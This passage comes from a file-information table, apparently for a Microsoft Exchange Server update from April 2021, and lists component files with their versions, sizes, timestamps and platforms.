\nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.858.9| 1,341,320| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.858.9| 511,864| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.858.9| 47,488| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.858.9| 873,856| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.858.9| 1,352,584| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.858.9| 1,018,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.858.9| 111,480| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.858.9| 19,328| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.858.10| 60,824| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.858.9| 50,576| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.services.common.dll| 15.2.858.10| 74,120| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.services.dll| 15.2.858.10| 8,480,656| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.858.10| 633,728| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.858.10| 1,651,064| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.services.json.dll| 15.2.858.10| 296,344| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.858.10| 43,392| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.858.9| 233,336| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.858.10| 178,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.858.10| 348,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.858.9| 93,064| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.858.10| 296,328| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.858.10| 35,736| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.858.10| 27,032| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.858.10| 114,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.858.10| 53,648| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.858.9| 75,136| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.858.9| 142,712| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.858.9| 58,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.858.9| 27,016| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.858.9| 46,976| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.sqm.dll| 15.2.858.9| 46,968| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.store.service.exe| 15.2.858.9| 28,032| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.858.9| 26,504| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.858.9| 31,640| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.858.9| 1,205,128| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.858.9| 158,600| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.858.10| 628,104| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.858.10| 16,256| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.858.9| 13,200| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.858.9| 221,568| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.858.10| 29,064| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.858.10| 138,648| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.858.10| 40,320| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.858.10| 22,912| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.858.10| 21,376| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.858.10| 212,352| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.858.10| 22,920| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.858.10| 169,352| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.858.9| 20,880| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.858.10| 46,976| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.858.9| 53,136| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.858.10| 44,936| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.858.9| 457,088| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.858.9| 30,592| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.dll| 15.2.858.10| 4,183,936| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.858.9| 182,168| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.858.9| 121,752| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.858.9| 403,848| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.858.9| 90,000| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.858.9| 88,960| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.858.9| 63,360| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.858.10| 430,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.858.9| 122,248| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.858.9| 17,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.858.9| 29,048| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.858.9| 50,072| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.858.9| 33,152| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.858.9| 113,032| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.858.9| 18,320| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.858.9| 675,208| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.858.10| 23,936| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.858.10| 17,808| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.858.10| 487,320| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.858.10| 306,056| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.858.10| 46,464| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.858.10| 1,044,376| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.858.9| 15,224| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.858.9| 18,840| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.858.10| 18,832| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.858.9| 118,656| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.858.10| 924,552| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.858.10| 1,469,320| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.858.9| 41,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.858.10| 50,056| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.858.9| 642,456| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.858.9| 186,248| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.858.9| 67,464| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.858.9| 27,528| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.858.9| 120,720| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.webservices.dll| 15.2.858.9| 1,054,088| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.858.9| 67,976| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.858.10| 23,432| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.858.9| 77,176| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.858.9| 505,240| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.858.9| 66,448| 04-Apr-2021| 08:29| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.858.9| 19,352| 04-Apr-2021| 08:39| x86 \nMicrosoft.filtering.dll| 15.2.858.9| 113,016| 04-Apr-2021| 08:32| x86 \nMicrosoft.filtering.exchange.dll| 15.2.858.10| 57,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.filtering.interop.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.858.9| 46,992| 04-Apr-2021| 08:44| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.858.9| 15,768| 04-Apr-2021| 08:43| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:28| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.858.9| 34,688| 04-Apr-2021| 08:27| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,945| 04-Apr-2021| 08:31| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,325| 04-Apr-2021| 08:31| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 1,518,472| 04-Apr-2021| 08:35| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:32| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.858.10| 33,168| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.858.10| 50,568| 04-Apr-2021| 08:31| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.858.9| 541,576| 04-Apr-2021| 08:31| x86 \nMicrosoft.managementgui.dll| 15.2.858.9| 133,520| 04-Apr-2021| 08:39| x86 \nMicrosoft.mce.interop.dll| 15.2.858.9| 24,448| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.audit.dll| 15.2.858.9| 124,800| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.858.9| 593,296| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.858.10| 217,976| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.compliance.console.dll| 15.2.858.10| 854,936| 04-Apr-2021| 08:28| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.858.10| 485,760| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.compliance.core.dll| 15.2.858.9| 413,064| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.858.9| 36,232| 04-Apr-2021| 08:33| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.858.10| 84,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.858.9| 1,782,136| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.858.10| 27,544| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.858.9| 174,976| 04-Apr-2021| 08:28| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.858.9| 166,272| 04-Apr-2021| 08:28| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.858.9| 40,328| 04-Apr-2021| 08:28| x86 \nMicrosoft.online.box.shell.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.858.9| 120,200| 04-Apr-2021| 08:33| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,150| 04-Apr-2021| 08:38| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,088| 04-Apr-2021| 08:38| Not applicable \nMovemailbox.ps1| Not applicable| 61,196| 04-Apr-2021| 08:36| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,622| 04-Apr-2021| 08:37| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,556| 04-Apr-2021| 08:37| Not applicable \nMpgearparser.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:29| x64 \nMsclassificationadapter.dll| 15.2.858.9| 248,712| 04-Apr-2021| 08:28| x64 \nMsexchangecompliance.exe| 15.2.858.10| 78,720| 04-Apr-2021| 08:28| x86 \nMsexchangedagmgmt.exe| 15.2.858.10| 25,472| 04-Apr-2021| 08:39| x86 \nMsexchangedelivery.exe| 15.2.858.10| 38,792| 04-Apr-2021| 08:39| x86 \nMsexchangefrontendtransport.exe| 15.2.858.10| 31,616| 04-Apr-2021| 08:39| x86 \nMsexchangehmhost.exe| 15.2.858.10| 27,032| 04-Apr-2021| 08:27| x86 \nMsexchangehmrecovery.exe| 15.2.858.9| 29,584| 04-Apr-2021| 08:32| x86 \nMsexchangemailboxassistants.exe| 15.2.858.10| 72,584| 04-Apr-2021| 08:39| x86 \nMsexchangemailboxreplication.exe| 15.2.858.10| 20,872| 04-Apr-2021| 08:43| x86 \nMsexchangemigrationworkflow.exe| 15.2.858.10| 69,000| 04-Apr-2021| 08:39| x86 \nMsexchangerepl.exe| 15.2.858.10| 71,040| 04-Apr-2021| 08:38| x86 \nMsexchangesubmission.exe| 15.2.858.10| 123,288| 04-Apr-2021| 08:39| x86 \nMsexchangethrottling.exe| 15.2.858.9| 39,832| 04-Apr-2021| 08:39| x86 \nMsexchangetransport.exe| 15.2.858.9| 74,104| 04-Apr-2021| 08:39| x86 \nMsexchangetransportlogsearch.exe| 15.2.858.10| 139,152| 04-Apr-2021| 08:39| x86 \nMsexchangewatchdog.exe| 15.2.858.9| 55,688| 04-Apr-2021| 08:39| x64 \nMspatchlinterop.dll| 15.2.858.9| 53,640| 04-Apr-2021| 08:38| x64 \nNativehttpproxy.dll| 15.2.858.9| 91,528| 04-Apr-2021| 08:42| x64 \nNavigatorparser.dll| 15.2.858.9| 636,800| 04-Apr-2021| 08:29| x64 \nNego2nativeinterface.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:38| x64 \nNegotiateclientcertificatemodule.dll| 15.2.858.9| 30,080| 04-Apr-2021| 08:32| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,792| 04-Apr-2021| 08:37| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 04-Apr-2021| 08:35| Not applicable \nNtspxgen.dll| 15.2.858.9| 80,776| 04-Apr-2021| 08:42| x64 \nOleconverter.exe| 15.2.858.9| 173,960| 04-Apr-2021| 08:39| x64 \nOutsideinmodule.dll| 15.2.858.9| 87,944| 04-Apr-2021| 08:29| x64 \nOwaauth.dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64 \nPerf_common_extrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64 \nPerf_exchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64 \nPipeline2.dll| 15.2.858.9| 1,454,480| 04-Apr-2021| 08:28| x64 \nPreparemoverequesthosting.ps1| Not applicable| 71,023| 04-Apr-2021| 08:38| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,257| 04-Apr-2021| 08:37| Not applicable \nProductinfo.managed.dll| 15.2.858.9| 27,024| 04-Apr-2021| 08:29| x86 \nProxybinclientsstringsdll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,266| 04-Apr-2021| 08:36| Not applicable \nQuietexe.exe| 15.2.858.9| 14,728| 04-Apr-2021| 08:39| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,572| 04-Apr-2021| 08:39| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,659| 04-Apr-2021| 08:38| Not applicable \nRemoteexchange.ps1| Not applicable| 23,577| 04-Apr-2021| 08:43| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,708| 04-Apr-2021| 08:36| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,026| 04-Apr-2021| 08:37| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,040| 04-Apr-2021| 08:38| Not applicable \nReplaycrimsonmsg.dll| 15.2.858.9| 1,104,768| 04-Apr-2021| 08:31| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,480| 04-Apr-2021| 08:39| Not applicable \nResetcasservice.ps1| Not applicable| 21,731| 04-Apr-2021| 08:36| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,105| 04-Apr-2021| 08:39| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,129| 04-Apr-2021| 08:39| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,198| 04-Apr-2021| 08:39| Not applicable \nRightsmanagementwrapper.dll| 15.2.858.9| 86,424| 04-Apr-2021| 08:39| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 04-Apr-2021| 08:37| Not applicable \nRpcperf.dll| 15.2.858.9| 23,432| 04-Apr-2021| 08:43| x64 \nRpcproxyshim.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:37| x64 \nRulesauditmsg.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x64 \nSafehtmlnativewrapper.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x64 \nScanenginetest.exe| 15.2.858.9| 956,296| 04-Apr-2021| 08:27| x64 \nScanningprocess.exe| 15.2.858.9| 739,208| 04-Apr-2021| 08:32| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,840| 04-Apr-2021| 08:36| Not applicable \nServicecontrol.ps1| Not applicable| 52,317| 04-Apr-2021| 08:27| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,782| 04-Apr-2021| 08:36| Not applicable \nSettingsadapter.dll| 15.2.858.9| 116,104| 04-Apr-2021| 08:27| x64 \nSetup.exe| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86 \nSetupui.exe| 15.2.858.10| 188,296| 04-Apr-2021| 08:43| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,217| 04-Apr-2021| 08:35| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,851| 04-Apr-2021| 08:39| Not applicable \nStatisticsutil.dll| 15.2.858.9| 142,232| 04-Apr-2021| 08:29| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,137| 04-Apr-2021| 08:38| Not applicable \nStoretsconstants.ps1| Not applicable| 15,818| 04-Apr-2021| 08:37| Not applicable \nStoretslibrary.ps1| Not applicable| 27,987| 04-Apr-2021| 08:38| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:40| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,955| 04-Apr-2021| 08:37| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 44,001| 04-Apr-2021| 08:38| Not applicable \nTextconversionmodule.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,731| 04-Apr-2021| 08:37| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,421| 04-Apr-2021| 08:35| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,017| 04-Apr-2021| 08:36| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,477| 04-Apr-2021| 08:39| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,058| 04-Apr-2021| 08:38| Not applicable \nUpdatecas.ps1| Not applicable| 35,786| 04-Apr-2021| 08:39| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 04-Apr-2021| 08:39| Not applicable \nUpdateserver.exe| 15.2.858.9| 3,014,536| 04-Apr-2021| 08:28| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,184| 04-Apr-2021| 08:37| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 04-Apr-2021| 08:34| Not applicable \nWsbexchange.exe| 15.2.858.9| 125,320| 04-Apr-2021| 08:44| x64 \nX400prox.dll| 15.2.858.9| 103,296| 04-Apr-2021| 08:35| x64 \n_search.lingoperators.a| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable \n_search.lingoperators.b| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable \n_search.mailboxoperators.a| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable \n_search.mailboxoperators.b| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable \n_search.operatorschema.a| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable \n_search.operatorschema.b| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable \n_search.tokenoperators.a| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not applicable \n_search.tokenoperators.b| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not 